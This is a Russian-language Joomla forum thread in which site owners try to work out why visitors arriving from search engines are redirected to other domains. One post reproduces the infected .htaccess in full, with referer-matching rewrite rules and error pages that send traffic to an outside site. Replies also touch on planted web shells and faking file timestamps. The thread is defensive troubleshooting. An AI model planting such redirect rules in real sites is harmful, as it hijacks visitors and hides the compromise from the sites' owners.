warez3300
Новичок
Репутация: +0/-0
 Offline
Сообщений: 3
|
 |
« : 13.03.2012, 12:38:09 » |
|
При переходе на мой сайт через поиск Google, открывается совершенно другой сайт, но когда вводишь в адресную строку, сайт открывается тот что нужно. В чем может быть причина, такого перехода в Google? В ya.ru все в порядке.
Например есть сайт: ermakoff.com.ua
В Google его можно найти по запросу: клоуны в павлограде
но результат запроса ведет на сайт: http://rur2.orge.pl/
Очень нужна ваша помощь.
Спасибо.
|
|
|
|
|
Записан
|
|
|
|
|
draff
|
|
« Ответ #1 : 13.03.2012, 12:39:44 » |
|
ищите скрипт eval(base64... в файлах сайта.
Вирус на сайте.или откат с бекап.
|
|
|
|
|
Записан
|
|
|
|
|
nixsystem
|
|
« Ответ #2 : 13.03.2012, 16:13:56 » |
|
Скорее всего где-то в коде шаблона авторами заложена такая кормушка. Бесплатный сыр бывает только в мышеловке, поэтому в большинстве бесплатных или варезных шаблонов, есть такие вложения.
Для того чтобы от этого избавиться нужно проанализировать код самого шаблона и модулей, идущих к нему в комплекте. Если найдется что-то странное - выкладывайте здесь, тут разберутся и посоветуют что с этим делать, да и другим будет полезна такая тема, если будут повторятся такие случаи.
|
|
|
|
|
Записан
|
|
|
|
|
intcorp
|
|
« Ответ #3 : 10.04.2012, 01:21:22 » |
|
Аналогичная проблема. Из результатов поиска перекидывает не на сайт, а на главную страницу Google. Откат пробовал делать, но проблема не решена, искал файлы, измененные за промежуток времени, ничего подозрительного не нашел  Пробовал зайти на сайт через мобильный пыталась загрузиться страница siulam.ru/indigo?5 Только что заканул пустую HTML страничку, а редирект всеравно есть. Проблема не в сайте, а чем-то другом... |
|
|
|
« Последнее редактирование: 10.04.2012, 01:38:04 от intcorp »
|
Записан
|
|
|
|
|
Marques
|
|
« Ответ #4 : 10.04.2012, 02:13:36 » |
|
Только что заканул пустую HTML страничку, а редирект всеравно есть. Проблема не в сайте, а чем-то другом... .htaccess - смотрите. Если там ничего нет - то не иначе как чудеса. |
|
|
|
|
Записан
|
|
|
|
|
intcorp
|
|
« Ответ #5 : 10.04.2012, 11:43:36 » |
|
Писал в поддержку хоста, проблема по ходу была действительно в .htaccess, хотя права на запись файла стояли 644 и дата изменения стояла на момент, когда я менял данные в январе этого года..
|
|
|
|
|
Записан
|
|
|
|
|
oriol
|
|
« Ответ #6 : 10.04.2012, 12:06:48 » |
|
|
|
|
|
|
Записан
|
|
|
|
|
Marques
|
|
« Ответ #7 : 10.04.2012, 13:40:45 » |
|
Писал в поддержку хоста, проблема по ходу была действительно в .htaccess, хотя права на запись файла стояли 644 и дата изменения стояла на момент, когда я менял данные в январе этого года..
Права для .htaccess и configuration.php в Joomla должны быть 444. строго 444, это рекомендация разработчиков. |
|
|
|
|
Записан
|
|
|
|
|
oriol
|
|
« Ответ #8 : 10.04.2012, 15:28:51 » |
|
если залит shell то до задницы эти права а поскольку изменили файл и поставили дату обратно то скорей всего так и есть.
Можно залить свой shell и попробовать выйти за пределы своего сайта, вплоть до папки /home и если это получится то тогда ж...
хостер чмошник и настройки гавно а shell может быть на любом соседнем сайте
|
|
|
|
|
Записан
|
|
|
|
|
draff
|
|
« Ответ #9 : 10.04.2012, 15:38:47 » |
|
если залит shell то до задницы эти права а поскольку изменили файл и поставили дату обратно то скорей всего так и есть.
Можно залить свой shell и попробовать выйти за пределы своего сайта, вплоть до папки /home и если это получится то тогда ж...
хостер чмошник и настройки гавно а shell может быть на любом соседнем сайте
Это у кого ж такие права,чтобы изменять время создания файла? |
|
|
|
|
Записан
|
|
|
|
|
oriol
|
|
« Ответ #10 : 10.04.2012, 15:57:10 » |
|
Да в легкую это делается
качаешь файл себе в тотале меняешь время, дату создания файла и заливаешь обратно
но речь идет от последнем изменении (редактирование) файла для этого и качать не надо меняешь прям на месте не парясь
|
|
|
|
|
Записан
|
|
|
|
|
intcorp
|
|
« Ответ #11 : 10.04.2012, 21:01:03 » |
|
Оказалось не все так просто Почистил файл .htaccess, поставил права 644, через непродолжительное время файлы снова переделаны и стоят с правами 444. На хосте несколько сайтов и абсолютно все файлы .htaccess перебиваются. Пробовал делать запрет по айпи http://joomlaforum.ru/index.php/topic,212231.0.html - до лампочки. Придется сносить все файлы и восстанавливаться из бэкапа |
|
|
|
|
Записан
|
|
|
|
|
flyingspook
|
|
« Ответ #12 : 10.04.2012, 21:19:38 » |
|
сканер в подписи проверь все сайт на наличие бэкдор
если что стучи в лс
|
|
|
|
|
Записан
|
|
|
|
|
wishlight
|
|
« Ответ #13 : 10.04.2012, 21:30:09 » |
|
Лог доступа на период взлома есть?
|
|
|
|
|
Записан
|
|
|
|
BioHaker
Осваиваюсь на форуме
Репутация: +0/-0
Offline
Сообщений: 39
|
|
« Ответ #14 : 13.04.2012, 16:18:32 » |
|
Последняя попытка. Как поступать?! ! Ситуация очень похожа к той, что описана выше. В моём случае регулярно изменяется .htaccess raplace.php - по запросам "eval", и тому подобным - результата не дал. Вот таким образом .htaccess изменён сейчас (повержен вирусом)
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://kas-oas.ru/space?7 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://kas-oas.ru/space?7 [R=301,L]
</IfModule>
RewriteEngine On
RewriteCond %{HTTP_HOST} ^www.areny.lviv.ua$ [NC]
##
# @version $Id: htaccess.txt 14401 2010-01-26 14:10:00Z louis $
# @package Joomla
# @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##
#####################################################
# READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations. It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file. If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your SEF url's. If they work,
# it has been set by your server administrator and you do not need it set here.
#
#####################################################
## Can be commented out if causes errors, see notes above.
Options +FollowSymLinks
#
# mod_rewrite in use
RewriteEngine On
########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
## Deny access to extension XML files (uncomment out to activate)
#<Files ~ "\.xml$">
#Order allow,deny
#Deny from all
#Satisfy all
#</Files>
## End of deny access to extension XML files
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits
# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla! Directory (just / for root)
# RewriteBase /
########## Begin - Joomla! core SEF Section
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$ [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#
ErrorDocument 400 http://kas-oas.ru/space?7
ErrorDocument 401 http://kas-oas.ru/space?7
ErrorDocument 403 http://kas-oas.ru/space?7
ErrorDocument 404 http://kas-oas.ru/space?7
ErrorDocument 500 http://kas-oas.ru/space?7
Настоятельно рекомендуют обновиться до Joomla 2.5. Но шаблон сайта устроен так, что будет корректно работать только на 1.5. При смене даже на 1.7, всё идёт "коду под хвост". Так что у меня тут только один вариант: Установить с "0" Joomla 2.5. Подобрать шаблон. И мигрировать всю гору информации на новый дизайн (если такое вообще возможно с 1.5 > 2.5). Спасибо. |
|
|
|
« Последнее редактирование: 25.04.2012, 15:10:25 от flyingspook »
|
Записан
|
|
|
|
|
Marques
|
|
« Ответ #15 : 13.04.2012, 16:27:01 » |
|
Ну есть еще вариант... обратиться в коммерческий раздел с просьбой почистить сайт, закрыть все дыры и настроить. Но уже за деньги конечно.
|
|
|
|
|
Записан
|
|
|
|
|
